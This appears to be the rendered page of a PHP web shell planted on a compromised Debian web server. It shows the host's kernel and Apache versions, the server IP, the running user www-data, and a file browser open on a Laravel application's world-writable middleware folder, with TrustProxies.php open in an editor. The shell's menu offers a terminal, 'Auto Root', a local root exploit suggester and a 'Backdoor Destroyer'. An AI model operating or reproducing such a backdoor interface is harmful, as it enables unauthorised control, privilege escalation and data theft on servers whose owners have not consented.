Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
iNetty /
app /
Http /
Middleware /
Delete
Unzip
Name
Size
Permission
Date
Action
Authenticate.php
504
B
-rwxrwxrwx
2022-04-21 13:43
CheckForMaintenanceMode.php
335
B
-rwxrwxrwx
2022-04-21 13:43
EncryptCookies.php
294
B
-rwxrwxrwx
2022-04-21 13:43
JsonApi.php
470
B
-rwxrwxrwx
2022-04-21 13:43
RedirectIfAuthenticated.php
582
B
-rwxrwxrwx
2022-04-21 13:43
TrimStrings.php
340
B
-rwxrwxrwx
2022-04-21 13:43
TrustProxies.php
436
B
-rwxrwxrwx
2022-04-21 13:43
VerifyCsrfToken.php
463
B
-rwxrwxrwx
2022-04-21 13:43
Save
Rename
<?php namespace App\Http\Middleware; use Fideloper\Proxy\TrustProxies as Middleware; use Illuminate\Http\Request; class TrustProxies extends Middleware { /** * The trusted proxies for this application. * * @var array|string */ protected $proxies; /** * The headers that should be used to detect proxies. * * @var int */ protected $headers = Request::HEADER_X_FORWARDED_ALL; }